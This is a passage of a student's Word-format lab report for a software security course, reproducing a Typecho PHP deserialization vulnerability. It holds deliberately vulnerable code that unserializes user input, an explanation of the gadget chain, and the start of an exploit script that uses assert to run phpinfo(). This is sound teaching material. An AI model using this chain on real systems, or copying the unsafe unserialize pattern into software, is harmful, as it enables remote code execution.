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0D40F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>《软件安全》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B44D9E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>蒋枘言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  学号：2313546  班级：信息安全班</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05127E25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、实验名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DF974">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A79F1E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="422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复现反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA66DB2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="422" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8FFD2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、实验要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F02818">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783F19E0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>复现12.2.3中的反序列化漏洞，并执行其他的系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D09B91">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ECC074">
      <w:pPr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sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>三、实验过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381ED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739151D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（一）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源码部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22D66E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA41C7D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我们还是使用Windows XP虚拟机。在phpnow\htdocs路径下创建文件typecho.php，PHP代码的内容如下：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66E9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99FEF5"/>
          </w:tcPr>
          <w:p w14:paraId="5C5ACD91">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="新宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21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新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typecho.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="56381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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="262CFD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800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
                <w:shd w:val="clear"/>
              </w:rPr>
              <w:t>?p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>hp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE5D9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  <w:shd w:val="clear" w:color="auto" w:fill="auto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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2539BD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  <w:shd w:val="clear" w:color="auto" w:fill="auto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  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> *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  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
              </w:rPr>
              <w:t>Typecho_Db 类</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4403D4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 xml:space="preserve"> */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8496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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Db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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F17F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public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function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__construct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($adapterName){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD20E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将传入的 $adapterName拼接成完整的适配器类名。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3056A6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注意：这里只是构建了类名，并没有真正实例化这个类。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2116FB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$adapterName = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'Typecho_Db_Adapter_'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. $adapterName;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536F34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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362DD3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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A501E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</w:p>
          <w:p w14:paraId="096000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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280F8D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 xml:space="preserve"> * Typecho_Feed 类</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7520B7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 xml:space="preserve"> * 关键点在于其 __toString() 魔术方法。当 Typecho_Feed 对象被当作字符串使用时，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会自动触发 __toString() 方法，而该方法内部会尝试访问$this-&gt;item['author']-&gt;screenName。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544F87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 xml:space="preserve"> * 这就为我们提供了一个触发其他对象方法调用的机会。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FC3F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 xml:space="preserve"> */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D09E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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Feed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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364390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private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$item;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私有属性，用于存储Feed项数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF49F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</w:p>
          <w:p w14:paraId="7F15C8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public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function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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>__toString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(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="607426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当对象被视为字符串时自动调用。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553521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尝试访问 $this-&gt;item 数组中 'author' 键对应的对象的 'screenName' 属性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404F2A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如果 $this-&gt;item['author'] 是一个对象，且该对象没有 screenName 属性，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或者 screenName 是一个方法，就会触发 __call() 等魔术方法。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9C73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return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$this-&gt;item[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'author'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]-&gt;screenName;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C522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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB141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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C485A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</w:p>
          <w:p w14:paraId="22BF4A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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3242A2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 xml:space="preserve"> * Typecho_Request 类</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6BEE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 xml:space="preserve"> * 包含 __get() 和 get() 方法，用于获取请求参数。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5230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 xml:space="preserve"> * 最重要的是 _applyFilter() 方法，它会迭代执行存储在 $_filter 属性中的过滤器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6E36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 xml:space="preserve"> * 如果 $_filter 中包含可控的函数名，并且我们能控制 $value，那么就可能实现任意函数执行。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F493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 xml:space="preserve"> */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2586DB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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Request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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7394E7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</w:p>
          <w:p w14:paraId="06593C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private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$_params =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array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();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存储请求参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232DC7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private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$_filter =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array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();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存储过滤器 (函数名或方法名)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A119B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</w:p>
          <w:p w14:paraId="5EA3BD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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6CDA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 xml:space="preserve">     * 魔术方法：当尝试读取不可访问或不存在的属性时触发。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BAE6D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 xml:space="preserve">     * 这里它会调用 get() 方法来获取属性值。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63185C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 xml:space="preserve">     */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC7C7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public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function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__get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($key)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CADC6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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7F02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return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$this-&gt;get($key);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA8CB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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1198B1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</w:p>
          <w:p w14:paraId="521A9A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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252ACB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 xml:space="preserve">     * 获取请求参数。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C089F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 xml:space="preserve">     * 会对获取到的值应用过滤器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA4D1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 xml:space="preserve">     */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1320BE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public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function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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>get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($key, $default =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NULL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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2E01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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2873CD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switch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(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true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) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8D68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case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isset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($this-&gt;_params[$key]):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016932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        $value = $this-&gt;_params[$key];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="321B39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    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break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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E580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default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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7295A9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        $value = $default;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4048F6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    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break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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6137D6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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2600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对值进行简单的处理，确保不是空数组且长度大于0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4B6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$value = !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is_array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($value) &amp;&amp;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strlen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($value) &gt; 0 ? $value : $default;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F37E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应用过滤器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BB81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return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$this-&gt;_applyFilter($value);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F9944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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653A81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</w:p>
          <w:p w14:paraId="4B24D5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/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F879B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 xml:space="preserve">     * 应用过滤器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176786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 xml:space="preserve">     * 遍历 $_filter 数组中的每一个过滤器，并用 call_user_func 调用它。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EACB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 xml:space="preserve">     * 这是核心的利用点之一，如果 $_filter 可控，就可以执行任意函数。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554761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 xml:space="preserve">     */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="169A99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private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function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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>_applyFilter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($value)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768100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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12849D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if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($this-&gt;_filter) {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如果存在过滤器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="342633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foreach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($this-&gt;_filter as $filter) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="283C10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       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如果值是数组，则对数组中的每个元素应用过滤器；否则直接调用过滤器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369879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        $value =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is_array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($value) ?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array_map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($filter, $value) :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DD61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    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call_user_func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($filter, $value);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关键：任意函数调用点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BDC25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    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48738F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</w:p>
          <w:p w14:paraId="2BEB7C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   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过滤器使用后清空，这通常是为了防止重复执行，但对单次利用影响不大。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735191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    $this-&gt;_filter =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array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();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DE5D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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B66CD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</w:p>
          <w:p w14:paraId="68BADC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return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$value;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5078FF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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB3A4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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3E37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</w:p>
          <w:p w14:paraId="6E3144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接收来自 GET 请求的 '__typecho_config' 参数，对其进行 Base64 解码，然后反序列化。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCF43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这是一个明确的用户可控的反序列化入口点。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCBD1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$config =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unserialize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base64_decode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($_GET[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'__typecho_config'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]));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C9E5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</w:p>
          <w:p w14:paraId="40C324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使用反序列化得到的 $config['adapter'] 作为参数，实例化 Typecho_Db 对象。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685C1F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Typecho_Db 的构造函数会将 $config['adapter'] 拼接成一个类名。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1204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$db =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new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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Db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($config[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'adapter'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]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134265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eastAsia="新宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AF045A1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1980B6AE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 Typecho 代码片段中包含一个经典的 PHP 反序列化漏洞利用链，最终目标是实现任意代码执行。漏洞核心：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unserialize(base64_decode($_GET['__typecho_config']))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在于用户可控的输入上，没有做任何限制或校验，这意味着攻击者可以完全控制反序列化后的对象内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CCAF88">
      <w:pPr>
        <w:widowControl w:val="0"/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利用链概述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E1138">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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入口点：unserialize() 反序列化用户输入的恶意数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B77C6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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触发点1：通过构造 Typecho_Feed 对象，利用其 __toString() 魔术方法，当该对象被当作字符串使用时，会尝试访问 $this-&gt;item['author']-&gt;screenName。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AADA9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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触发点2：将 Typecho_Feed 对象的 $this-&gt;item['author'] 属性设置为一个恶意的 Typecho_Request 对象。当 $this-&gt;item['author']-&gt;screenName 被访问时，会触发 Typecho_Request 对象的 __get('screenName') 魔术方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC26862">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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触发点3：Typecho_Request 的 __get() 方法会调用 get('screenName')，进而调用 _applyFilter() 方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23432AEA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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核心利用：在 _applyFilter() 方法中，如果我们将 Typecho_Request 对象的 _filter 属性设置为一个包含恶意函数名（如 system 或 exec）的数组，并将 _params['screenName'] 设置为要执行的命令，那么 call_user_func($filter, $value) 就会执行我们指定的系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0663A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133827BA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用代码部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C973F0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113FCBFD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我们据此构造出利用代码exe.php，如下所示。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E2F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99FEF5"/>
          </w:tcPr>
          <w:p w14:paraId="1FF402AE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="新宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21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新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exe.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4A6A3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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="652845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800000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDD0E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定义 Typecho_Feed 类，与目标 Typecho 应用中的结构一致</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBC98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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Feed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="127413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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5F73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private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$item;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私有属性，将在反序列化时被设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A0A2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</w:p>
          <w:p w14:paraId="492EFB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public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function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__construct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(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462840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在 Typecho_Feed 对象被实例化时（包括通过反序列化），</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E979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将 $this-&gt;item['author'] 设置为一个 Typecho_Request 的新实例。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC023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这是构建利用链的关键一步，因为它将控制权从 Typecho_Feed 转移到 Typecho_Request。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576698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$this-&gt;item =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array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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6050FF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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'author'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=&gt;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new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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Request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(),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0AA9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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2477D4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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8E38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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38968F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</w:p>
          <w:p w14:paraId="0F405F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定义 Typecho_Request 类，与目标 Typecho 应用中的结构一致</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C5AE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class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2B91AF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Typecho_Request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F26E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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A169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private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$_params =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array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();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存储请求参数，这里用于存放待执行的命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C105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private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$_filter =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array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();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存储过滤器函数，这里用于存放要调用的恶意函数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA2AD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</w:p>
          <w:p w14:paraId="4024F9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public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function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__construct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(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297C27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在 Typecho_Request 对象被实例化时，设置其私有属性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020840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$_params['screenName'] 被设置为 'phpinfo()'，这将是我们通过 assert 执行的命令/代码。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="101B01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$_filter[0] 被设置为 'assert'，这是我们希望 Typecho_Request::_applyFilter() 调用的函数。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C806D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$this-&gt;_params[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="新宋体" w:cs="Consolas"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="32"/>
